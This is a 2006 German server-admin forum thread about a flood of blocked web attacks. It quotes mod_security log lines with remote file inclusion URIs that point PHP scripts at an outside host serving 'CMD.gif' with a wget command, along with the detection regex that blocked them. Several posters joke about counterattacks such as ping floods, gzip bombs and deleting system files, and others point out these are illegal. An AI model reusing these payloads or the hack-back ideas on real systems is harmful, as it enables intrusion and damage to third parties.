neuer Bot? Ferien?

Rund um die Sicherheit des Systems und die Applikationen
ghoster1970
Posts: 71
Joined: 2006-06-21 13:31
Location: Potsdam

neuer Bot? Ferien?

Post by ghoster1970 » 2006-08-02 21:49

Code: Select all

[Tue Aug 01 14:31:16 2006] [error] [client 195.86.124.210] mod_security: Access denied with code 500. Pattern match "\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI [id "300018"] [rev "1"] [msg "Generic PHP code injection protection"] [severity "CRITICAL"] [hostname "xx.xx.xx.xx"] [uri "http://xx.xx.xx.xx/editprofile.php?pathtohomedir=http://webmail.hostfactory.ch/CMD.gif?&cmd=wget"]
[Tue Aug 01 14:31:16 2006] [error] [client 195.86.124.210] mod_security: Access denied with code 500. Pattern match "\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI [id "300018"] [rev "1"] [msg "Generic PHP code injection protection"] [severity "CRITICAL"] [hostname "xx.xx.xx.xx"] [uri "http://xx.xx.xx.xx/lib/tree/layersmenu.inc.php?myng_root=http://webmail.hostfactory.ch/CMD.gif?&cmd=wget"]
...
...
[Wed Aug 02 20:39:59 2006] [error] [client 210.51.162.45] 
mod_security: Access denied with code 500. Pattern match "^GET (http|https|ftp)\\:/" at THE_REQUEST [severity "EMERGENCY"] [hostname "www.ebay.com"] [uri "http://www.ebay.com/"]
[Wed Aug 02 20:52:44 2006] [error] [client 212.227.93.233] Directory index forbidden by rule: /var/www/hosts/default/htdocs/
[Wed Aug 02 21:09:56 2006] [error] [client 210.51.162.45] mod_security: Access denied with code 500. Pattern match "^GET (http|https|ftp)\\:/" at THE_REQUEST [severity "EMERGENCY"] [hostname "www.ebay.com"] [uri "http://www.ebay.com/"]
Hab seit gestern mehr als 10.000 solcher Einträge in den Logs.
Ist das alleine mit den Ferien zu begründen?

lord_pinhead
Posts: 774
Joined: 2004-04-26 15:57

Re: neuer Bot? Ferien?

Post by lord_pinhead » 2006-08-02 22:00

Glaub nicht, oder sind in den Niederlande grad Ferien? Wenn ja, kann es sein, schick ne Abuse raus oder lass es :)

User avatar
daemotron
Administrator
Administrator
Posts: 2635
Joined: 2004-01-21 17:44

Re: neuer Bot? Ferien?

Post by daemotron » 2006-08-02 22:07

Ist es eigentlich illegal, wenn man sich auf solche Attacken "proaktiv" zur Wehr setzt? Ich denke da so an floodping mit 1024kB großen "Nutzlasten" à là Winnuke... Modem- und ISDN-Usern müsste man auf die Tour doch 'n ziemlichen Schrecken einjagen können :D

flo
Posts: 2223
Joined: 2002-07-28 13:02
Location: Berlin

Re: neuer Bot? Ferien?

Post by flo » 2006-08-02 22:18

Oder ein vorkomprimiertes 1GB-gif per gz ausliefern ... holla ... wäre doch was :-)

flo.

lord_pinhead
Posts: 774
Joined: 2004-04-26 15:57

Re: neuer Bot? Ferien?

Post by lord_pinhead » 2006-08-02 22:24

Die armen Leute die normal auf die Seite surfen :D

sledge0303
Posts: 695
Joined: 2005-09-16 00:06
Location: Berlin-Reinickendorf

Re: neuer Bot? Ferien?

Post by sledge0303 » 2006-08-02 22:37

Es müßte während dieser Angriffsversuche ein Skript gestartet werden, Befehl: starte auf der Gegenseite (Angreifer) IE/Firefox, diese öffnen wiederum neue Browserfenster "Inhalt: nein nein das darfst du nicht!!! dazu noch einen Stinkefinger..."
Es werden so viele neue Fenster geöffnet bis der Speicher voll ist und seine Kiste absäuft!!!

User avatar
daemotron
Administrator
Administrator
Posts: 2635
Joined: 2004-01-21 17:44

Re: neuer Bot? Ferien?

Post by daemotron » 2006-08-02 22:50

Ich werden Delinquenten einfach künftig einen Super-Virus verpassen:
http://ripfiles.e-workers.de/nettz/virus.php

sledge0303
Posts: 695
Joined: 2005-09-16 00:06
Location: Berlin-Reinickendorf

Re: neuer Bot? Ferien?

Post by sledge0303 » 2006-08-02 23:01

Es reicht schon wenn auf einer Windoofs-Büchse "ntldr" löschst...
Die meisten achsosuperschlauen Hacker wissen gar nicht wie man das wieder, mit Ausnahme einer Neuinstallation, beheben kann :D

Naja, mit Virus oder löschen von Systemdateien... leider ist beides strafbar...aber träumen darf man doch davon...

User avatar
centro
Posts: 25
Joined: 2006-08-27 17:32
Location: Hauptstadt des Spargels

Re: neuer Bot? Ferien?

Post by centro » 2006-09-01 09:00

Ich weis zwar nicht ob das bei Windoof auch zieht aber ich hab mal vor geraumer Zeit was von "Hack umleitung" gelesen.

Sprich nach schnellem 3 maligen falschen Login wird jeder versuch der IP wie ein spiegel zurück geworfen und der lustige Mensch versucht bei sich selber rein zu kommen!

Sowas würde ich so gerne mal ausprobieren und nebenbei zusehen wie er versucht bei sich reinzukommen! Da könnt ich bestimmt stundenlang vorm Rechner sitzen! :oops:

User avatar
isotopp
Posts: 471
Joined: 2003-08-21 10:21
Location: Berlin

Re: neuer Bot? Ferien?

Post by isotopp » 2006-09-01 13:15

jfreund wrote:Ist es eigentlich illegal, wenn man sich auf solche Attacken "proaktiv" zur Wehr setzt? Ich denke da so an floodping mit 1024kB großen "Nutzlasten" à là Winnuke... Modem- und ISDN-Usern müsste man auf die Tour doch 'n ziemlichen Schrecken einjagen können :D
Und wenn Du Equipment von Dritten auf dem Weg mit Deinem "Gegenangriff" erwischt, hast Du die Grünen selbst im Haus. Nicht wirklich eine schlaue Idee - Angriffe auf (Internet-) Infrastruktur sind immer gleich Terrorismus. Am nächsten Morgen wachst Du in Guantanamo auf.

User avatar
Joe User
Project Manager
Project Manager
Posts: 11139
Joined: 2003-02-27 01:00
Location: Hamburg

Re: neuer Bot? Ferien?

Post by Joe User » 2006-09-01 16:24

Code: Select all

if $CONNECT > 3 then redirect $USER to 256.256.256.256 endif
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.

User avatar
centro
Posts: 25
Joined: 2006-08-27 17:32
Location: Hauptstadt des Spargels

Re: neuer Bot? Ferien?

Post by centro » 2006-09-01 19:24

Ist das der Code für IP-Tables das der Versucht bei sich selbst rein zu kommen?

captaincrunch
Userprojekt
Userprojekt
Posts: 7066
Joined: 2002-10-09 14:30
Location: Dorsten

Re: neuer Bot? Ferien?

Post by captaincrunch » 2006-09-01 20:06

Diese Frage kannst du dir ganz einfach, auch ohne dir alles vorkauen zu lassen mit kurzem Blick in die Doku selbst beantworten.
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc

elch_mg
Posts: 302
Joined: 2006-01-23 19:14
Location: 41063

Re: neuer Bot? Ferien?

Post by elch_mg » 2006-09-01 20:35

hm... meine IP ist mal wieder nur 127.0.0.1..


(wer die Geschichte kennt: Nein, ich bin ein anderer Elch)

traced
Posts: 16
Joined: 2006-09-19 09:21

Re: neuer Bot? Ferien?

Post by traced » 2006-09-19 17:37

sagt euch das T-Shirt "i hacked 127.0.0.1" was? *fg*

muenchi
Posts: 62
Joined: 2006-08-11 03:15

Re: neuer Bot? Ferien?

Post by muenchi » 2006-09-19 22:51

Für alle die es nicht kennen (und nicht lange rumsuchen wollen)

http://www.stophiphop.com/modules/news/ ... toryid=184

User avatar
nyxus
Posts: 626
Joined: 2002-09-13 08:41
Location: Lübeck

Re: neuer Bot? Ferien?

Post by nyxus » 2006-09-20 01:05

traced wrote:sagt euch das T-Shirt "i hacked 127.0.0.1" was? *fg*
*der* gefällt mir ausserordentlich gut! :-)

traced
Posts: 16
Joined: 2006-09-19 09:21

Re: neuer Bot? Ferien?

Post by traced » 2006-09-20 02:08

Die Geschichte dazu is eigentlich noch besser als das Shirt.

Hat zwar nichts mit dem harten Admin Alltag zu tun,
aber wer ein wenig "Aufmunterung" sucht, sollte mal hier vorbeischaun: http://einzeller.tk :)

vg
Basti